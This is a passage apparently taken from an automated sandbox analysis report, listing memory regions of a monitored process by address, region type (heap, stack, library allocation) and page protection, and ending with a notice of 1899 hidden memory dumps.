page read and write
|
||
|
AE111FD000
|
stack
|
page read and write
|
||
|
C2027F000
|
stack
|
page read and write
|
||
|
7FF848E10000
|
trusted library allocation
|
page read and write
|
||
|
1F8C0252000
|
heap
|
page read and write
|
||
|
7FF8491A4000
|
trusted library allocation
|
page read and write
|
||
|
1F8C0259000
|
heap
|
page read and write
|
||
|
1391000
|
unkown
|
page read and write
|
||
|
1F8C0252000
|
heap
|
page read and write
|
||
|
199CC300000
|
heap
|
page read and write
|
||
|
7FF849080000
|
trusted library allocation
|
page read and write
|
||
|
7FF8490D0000
|
trusted library allocation
|
page read and write
|
||
|
1EE574F0000
|
heap
|
page read and write
|
||
|
2338BF50000
|
heap
|
page read and write
|
||
|
25D7026D000
|
heap
|
page read and write
|
||
|
2349C186000
|
trusted library allocation
|
page read and write
|
||
|
1F8C0252000
|
heap
|
page read and write
|
||
|
1F8C0252000
|
heap
|
page read and write
|
||
|
7FF849160000
|
trusted library allocation
|
page read and write
|
||
|
2349C18E000
|
trusted library allocation
|
page read and write
|
||
|
E9C000
|
unkown
|
page readonly
|
||
|
2BB895CD000
|
trusted library allocation
|
page read and write
|
||
|
1F8C0438000
|
heap
|
page read and write
|
||
|
1F8C024C000
|
heap
|
page read and write
|
||
|
1EE71351000
|
heap
|
page read and write
|
||
|
C000136000
|
direct allocation
|
page read and write
|
||
|
25D71B00000
|
trusted library section
|
page read and write
|
||
|
231D63F9000
|
heap
|
page read and write
|
||
|
1F8C024B000
|
heap
|
page read and write
|
||
|
234B3FA0000
|
heap
|
page read and write
|
||
|
1F0BD93C000
|
heap
|
page read and write
|
||
|
1F7ABE17000
|
heap
|
page read and write
|
||
|
1F8C5A40000
|
trusted library allocation
|
page read and write
|
||
|
FE5840E000
|
stack
|
page read and write
|
||
|
26B8FC52000
|
heap
|
page read and write
|
||
|
23499DDE000
|
heap
|
page read and write
|
||
|
15FB33B0000
|
heap
|
page read and write
|
||
|
1399000
|
unkown
|
page write copy
|
||
|
AB1C9C000
|
stack
|
page read and write
|
||
|
234B3FC0000
|
heap
|
page read and write
|
||
|
2325EA89000
|
heap
|
page read and write
|
||
|
1E25B220000
|
heap
|
page read and write
|
||
|
2349B960000
|
heap
|
page read and write
|
||
|
2BB839A4000
|
heap
|
page read and write
|
||
|
2627CD97000
|
direct allocation
|
page read and write
|
||
|
1F8C024E000
|
heap
|
page read and write
|
||
|
13FA19A4000
|
heap
|
page read and write
|
||
|
1F8C0404000
|
heap
|
page read and write
|
||
|
2BB8567B000
|
trusted library allocation
|
page read and write
|
||
|
2349BDFA000
|
trusted library allocation
|
page read and write
|
||
|
3C3D57B000
|
stack
|
page read and write
|
||
|
1F8C024C000
|
heap
|
page read and write
|
||
|
E05507B000
|
stack
|
page read and write
|
||
|
1E25B110000
|
heap
|
page read and write
|
||
|
13FA18B0000
|
trusted library allocation
|
page read and write
|
||
|
1F8C0402000
|
heap
|
page read and write
|
||
|
1F8C0259000
|
heap
|
page read and write
|
||
|
2466BE70000
|
heap
|
page read and write
|
||
|
C000116000
|
direct allocation
|
page read and write
|
||
|
19A2D121000
|
heap
|
page read and write
|
||
|
7FF8490E9000
|
trusted library allocation
|
page read and write
|
||
|
2325EAFD000
|
heap
|
page read and write
|
||
|
15FB3040000
|
heap
|
page read and write
|
||
|
25D72090000
|
heap
|
page read and write
|
||
|
1F8C03EF000
|
heap
|
page read and write
|
||
|
22F3FDF0000
|
heap
|
page read and write
|
||
|
7FF849020000
|
trusted library allocation
|
page read and write
|
||
|
1F8C024B000
|
heap
|
page read and write
|
||
|
1F0BD932000
|
heap
|
page read and write
|
||
|
1F8C024C000
|
heap
|
page read and write
|
||
|
1F8C0252000
|
heap
|
page read and write
|
||
|
1F8C024C000
|
heap
|
page read and write
|
||
|
1F0BD8F3000
|
heap
|
page read and write
|
||
|
1F8C03EC000
|
heap
|
page read and write
|
||
|
1F0BDA16000
|
heap
|
page read and write
|
||
|
1F8C024C000
|
heap
|
page read and write
|
||
|
13FA191D000
|
heap
|
page read and write
|
||
|
2325EA66000
|
heap
|
page read and write
|
||
|
1F8C03F3000
|
heap
|
page read and write
|
||
|
C203FE000
|
stack
|
page read and write
|
||
|
D94AB79000
|
stack
|
page read and write
|
||
|
199CC280000
|
heap
|
page read and write
|
||
|
1F8C024B000
|
heap
|
page read and write
|
||
|
1F8C024A000
|
heap
|
page read and write
|
||
|
E054F7D000
|
stack
|
page read and write
|
||
|
1F8C0239000
|
heap
|
page read and write
|
||
|
1F8BF9F0000
|
trusted library allocation
|
page read and write
|
||
|
1F8C024E000
|
heap
|
page read and write
|
||
|
D94B8CE000
|
stack
|
page read and write
|
||
|
ABCCEFF000
|
stack
|
page read and write
|
||
|
220FB469000
|
heap
|
page read and write
|
||
|
1F8C043D000
|
heap
|
page read and write
|
||
|
2F255FE000
|
stack
|
page read and write
|
||
|
4679E7C000
|
stack
|
page read and write
|
||
|
2349BDD2000
|
trusted library allocation
|
page read and write
|
||
|
1F8C59E0000
|
trusted library allocation
|
page execute
|
||
|
2349BE21000
|
trusted library allocation
|
page read and write
|
||
|
16486B20000
|
heap
|
page read and write
|
||
|
1EE712B0000
|
heap
|
page read and write
|
||
|
23499CFB000
|
heap
|
page read and write
|
||
|
1F8C03C6000
|
heap
|
page read and write
|
||
|
26B8FC41000
|
heap
|
page read and write
|
||
|
C000298000
|
direct allocation
|
page read and write
|
||
|
262572D0000
|
direct allocation
|
page read and write
|
||
|
6DBEDCF000
|
stack
|
page read and write
|
||
|
25D71B60000
|
heap
|
page read and write
|
||
|
234ABCB1000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E2D000
|
trusted library allocation
|
page execute and read and write
|
||
|
3A67DFC000
|
stack
|
page read and write
|
||
|
861000
|
unkown
|
page execute read
|
||
|
13FA1946000
|
heap
|
page read and write
|
||
|
1E25B1FB000
|
heap
|
page read and write
|
||
|
2BB88BCD000
|
trusted library allocation
|
page read and write
|
||
|
1F7ABE50000
|
heap
|
page read and write
|
||
|
25D72617000
|
heap
|
page read and write
|
||
|
1EE68EC1000
|
trusted library allocation
|
page read and write
|
||
|
1F8C0241000
|
heap
|
page read and write
|
||
|
2349C264000
|
trusted library allocation
|
page read and write
|
||
|
25D72159000
|
heap
|
page read and write
|
||
|
2338C022000
|
heap
|
page read and write
|
||
|
1F8C0252000
|
heap
|
page read and write
|
||
|
3A680FF000
|
unkown
|
page read and write
|
||
|
C2063C000
|
stack
|
page read and write
|
||
|
1F8C03B9000
|
heap
|
page read and write
|
||
|
1F8C0252000
|
heap
|
page read and write
|
||
|
1F8C59A0000
|
trusted library allocation
|
page read and write
|
||
|
C0002C0000
|
direct allocation
|
page read and write
|
||
|
7FF848EB0000
|
trusted library allocation
|
page read and write
|
||
|
CA8457E000
|
stack
|
page read and write
|
||
|
C00007B000
|
direct allocation
|
page read and write
|
||
|
1F8C024C000
|
heap
|
page read and write
|
||
|
1F8C07C2000
|
heap
|
page read and write
|
||
|
C201FE000
|
stack
|
page read and write
|
||
|
16486C20000
|
heap
|
page read and write
|
||
|
1EE572A9000
|
heap
|
page read and write
|
||
|
1F8C024C000
|
heap
|
page read and write
|
||
|
1F8C024C000
|
heap
|
page read and write
|
||
|
ABCCDFF000
|
unkown
|
page read and write
|
||
|
25D01135000
|
trusted library allocation
|
page read and write
|
||
|
1F8C024B000
|
heap
|
page read and write
|
||
|
7FF849130000
|
trusted library allocation
|
page read and write
|
||
|
1F8C024D000
|
heap
|
page read and write
|
||
|
2625741A000
|
direct allocation
|
page read and write
|
||
|
1851F710000
|
heap
|
page read and write
|
||
|
1F8C024E000
|
heap
|
page read and write
|
||
|
1EE71670000
|
heap
|
page read and write
|
||
|
1F8C01F0000
|
heap
|
page read and write
|
||
|
C000140000
|
direct allocation
|
page read and write
|
||
|
2325E980000
|
heap
|
page read and write
|
||
|
19A1F350000
|
heap
|
page read and write
|
||
|
1F8BF659000
|
trusted library allocation
|
page read and write
|
||
|
E05604F000
|
stack
|
page read and write
|
||
|
1F8C03EC000
|
heap
|
page read and write
|
||
|
F18000
|
unkown
|
page readonly
|
||
|
2BB85210000
|
trusted library allocation
|
page read and write
|
||
|
7FF8490A0000
|
trusted library allocation
|
page read and write
|
||
|
2627CD53000
|
direct allocation
|
page read and write
|
||
|
1F7ABF30000
|
heap
|
page read and write
|
||
|
7FF849250000
|
trusted library allocation
|
page read and write
|
||
|
1F8C0252000
|
heap
|
page read and write
|
||
|
C66B38D000
|
stack
|
page read and write
|
||
|
2BB839A2000
|
heap
|
page read and write
|
||
|
199CC0B0000
|
heap
|
page read and write
|
||
|
1F8C03C2000
|
heap
|
page read and write
|
||
|
1F8C023D000
|
heap
|
page read and write
|
||
|
C000296000
|
direct allocation
|
page read and write
|
||
|
7FF848EE6000
|
trusted library allocation
|
page execute and read and write
|
||
|
23499D34000
|
heap
|
page read and write
|
||
|
7FF848E30000
|
trusted library allocation
|
page read and write
|
||
|
1F8C026D000
|
heap
|
page read and write
|
||
|
1F8C0249000
|
heap
|
page read and write
|
||
|
E9C000
|
unkown
|
page readonly
|
||
|
1F8C0252000
|
heap
|
page read and write
|
||
|
23DBB230000
|
heap
|
page read and write
|
||
|
1F7ABF25000
|
heap
|
page read and write
|
||
|
1F8BF618000
|
trusted library allocation
|
page read and write
|
||
|
234B43F0000
|
heap
|
page read and write
|
||
|
E05614C000
|
stack
|
page read and write
|
||
|
1EE57480000
|
heap
|
page execute and read and write
|
||
|
220FB630000
|
heap
|
page read and write
|
||
|
1EE71301000
|
heap
|
page read and write
|
||
|
65CC1FF000
|
stack
|
page read and write
|
||
|
C000061000
|
direct allocation
|
page read and write
|
||
|
7FF8490F0000
|
trusted library allocation
|
page read and write
|
||
|
1F8C0267000
|
heap
|
page read and write
|
||
|
C2083E000
|
stack
|
page read and write
|
||
|
7FF848FDA000
|
trusted library allocation
|
page read and write
|
||
|
B88B0FE000
|
stack
|
page read and write
|
||
|
1F8C03B9000
|
heap
|
page read and write
|
||
|
1EE57250000
|
trusted library allocation
|
page read and write
|
||
|
1EE71660000
|
heap
|
page read and write
|
||
|
2BB854D8000
|
trusted library allocation
|
page read and write
|
||
|
1F8C0243000
|
heap
|
page read and write
|
||
|
1F8C0239000
|
heap
|
page read and write
|
||
|
2BB853E0000
|
heap
|
page execute and read and write
|
||
|
23DBAFF9000
|
heap
|
page read and write
|
||
|
C000138000
|
direct allocation
|
page read and write
|
||
|
1F8C03AD000
|
heap
|
page read and write
|
||
|
1F8C046D000
|
heap
|
page read and write
|
||
|
1F0BD930000
|
heap
|
page read and write
|
||
|
1EE5729B000
|
heap
|
page read and write
|
||
|
13FA18C0000
|
heap
|
page read and write
|
||
|
1EE57460000
|
trusted library allocation
|
page read and write
|
||
|
1EE571D0000
|
heap
|
page read and write
|
||
|
1F8C024C000
|
heap
|
page read and write
|
||
|
25D10077000
|
trusted library allocation
|
page read and write
|
There are 1899 hidden memdumps, click here to show them.